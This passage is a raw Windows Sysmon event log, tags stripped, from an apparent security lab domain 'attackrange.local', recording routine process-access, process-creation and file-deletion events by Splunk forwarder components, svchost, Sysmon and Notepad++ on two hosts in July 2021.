07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807054Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807053Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807052Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807051Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807050Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F406-60EB-6279-00000000D001}4020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807049Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:27.013{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F406-60EB-6279-00000000D001}4020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807048Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:26.998{0C1E0330-F406-60EB-6279-00000000D001}4020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807093Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.778{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89CF12A1BE537F0CF93B43803612A352,SHA256=4EAA2546CDAAEA4E9CFF7A1F3DB76DE40B42714BE6AE89958EE7393E3A39A2C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:28.758{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3F80ABD4E8703E0C8A7E7BBE5DFDC5F,SHA256=0A8C2A9023791A2C6343CA2DE643F69D2D668D83A5A0B9D3CFF05B6EDDF9B2C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:28.758{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29120A9617EBEDE0A5C1489BBBA39752,SHA256=3029307A241062588FA950E6A17AC7CC5B5917FDA7E2A4C18E753F05D3195B6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:28.143{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C2788614AA91D2C24765FFC509DF1C5,SHA256=88D1F81A7C7BF38E5EC5E8A1B49A918FF9CB87B17131915B5585D05F7A69BE44,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807092Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.528{0C1E0330-F408-60EB-6479-00000000D001}14924004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807091Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.388{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F408-60EB-6479-00000000D001}1492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807090Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807089Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807088Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807087Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807086Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807085Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807084Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807083Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807082Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.372{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807081Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.372{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F408-60EB-6479-00000000D001}1492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807080Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.372{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F408-60EB-6479-00000000D001}1492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807079Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.373{0C1E0330-F408-60EB-6479-00000000D001}1492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807078Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.075{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB705D421F1CCFE0EB9300CD88B90832,SHA256=F39F3DAD40FDAF72642B9F793EAAE488696AB0D19DACB9EC6823906FC2130345,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807095Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:29.794{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A21F85571A5DA65412A5DD99E84101A2,SHA256=8E93678906B37FD8FBFC39CCB780D5D4F857FDDED930050C7380656C8269820E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:29.157{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\session.xmlMD5=34DF94F53DBA090DD221C083102419FA,SHA256=68F34A76606DB3F89B01F320FE86EBE8236BAA67502718BB742D8C04721B45AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:29.157{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15812A27D22E5CA4651C10B86C801F4C,SHA256=11077D38AC6658CFB422914465400BBDE9936543E80B7E9087B5561B488A8408,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807094Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:29.606{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5AE1E067B72599A3E85A8F7C8B72E98,SHA256=B1C93E8C33A8E98CB1288F9A7B6DC69D9AA315673030ED7C740568CD7D82A5B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807097Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:30.841{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 